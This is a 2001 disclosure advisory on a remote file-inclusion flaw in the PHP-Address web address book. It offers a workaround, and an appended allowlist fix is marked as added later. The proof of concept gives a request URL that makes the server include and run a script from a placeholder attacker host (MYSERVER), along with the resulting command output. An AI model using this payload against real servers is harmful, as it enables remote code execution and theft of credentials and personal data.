From: tim vandermeersch (tim.vandermeerschpandora.be)
Date: Tue Dec 25 2001 - 22:19:11 CST

    PHP source injection in PHPAddress

    Description

    PHP-Address is a collection of PHP3-Scripts (works on PHP4 too)
    for maintaining a small web-based address-database. It can be found
    at http://phpaddress.huebsch-gemacht.de/

    Workaround

    Change the global.php3 file so it looks like this:
    <?php
    # (c) Copyright in 2000, 2001 by Chris Huebsch (chuinformatik.tu-chemnitz.de)
    $LangCookie = ""; // THIS LINE (clears any request-supplied value)
    if ($LangCookie)
      require("$LangCookie.php3"); // Line 5
    ...

    Tested version

    PHP Address 0.2e (09.12.2001)

    The Problem

    Any user who requests a URL like
    "http://SERVER/globals.php3?LangCookie=INCLUDE_FILE" is
    able to include any file he wants.

    Example

    I put a PHP script on my server which I wanted to include:

    ------------x.php3------------
    <?
        passthru("/bin/ls /");
    ?>
    -------------------------------

    Then I requested this URL:
    http://SERVER/globals.php3?LangCookie=http://MYSERVER/x
    (the .php3 is already there; look at line 5 in global.php3)

    ------------output------------
    bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
    usr var
    ------------------------------

    Note that any PHP code could be included; malicious users could get access
    to database passwords, personal information, ...

    ------------------------------
    Tim Vandermeersch
    Tim.Vandermeerschpandora.be
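
    Added example (not part of the original advisory and not PHP-Address code): the workaround above disables language selection entirely, whereas an allowlist keeps it while ensuring that no request value reaches require(). The language codes, the function name language_file() and the use of a current PHP version are assumptions.

```php
<?php
// Added example: allowlist check for the language include in global.php3.
// The language codes and the function name are assumptions, not PHP-Address code.

// Assumed set of language files shipped beside global.php3 (e.g. de.php3, en.php3).
const ALLOWED_LANGUAGES = ['de', 'en'];

/**
 * Map an untrusted language value to a local file name, or null if the
 * value is not on the allowlist. Nothing from the request reaches the path.
 */
function language_file($untrusted): ?string
{
    // Arrays (?LangCookie[]=x) and other non-strings are rejected outright.
    if (!is_string($untrusted)) {
        return null;
    }
    // Strict comparison: only exact, known codes pass. URLs, "../" sequences
    // and absolute paths all fail here because they are not in the list.
    $index = array_search($untrusted, ALLOWED_LANGUAGES, true);
    if ($index === false) {
        return null;
    }
    // Build the name from the allowlist entry, not from the request value.
    return __DIR__ . '/' . ALLOWED_LANGUAGES[$index] . '.php3';
}

// Constructed sample inputs, including the value from the advisory's example.
$samples = ['de', 'http://MYSERVER/x', '../../etc/passwd', '', ['de']];
foreach ($samples as $value) {
    $file = language_file($value);
    $shown = json_encode($value, JSON_UNESCAPED_SLASHES);
    printf("%-22s => %s\n", $shown, $file === null ? 'rejected' : basename($file));
}

// In global.php3 the include would then read the cookie explicitly instead
// of relying on a request-populated global:
//   $file = language_file($_COOKIE['LangCookie'] ?? null);
//   if ($file !== null && is_file($file)) { require $file; }
```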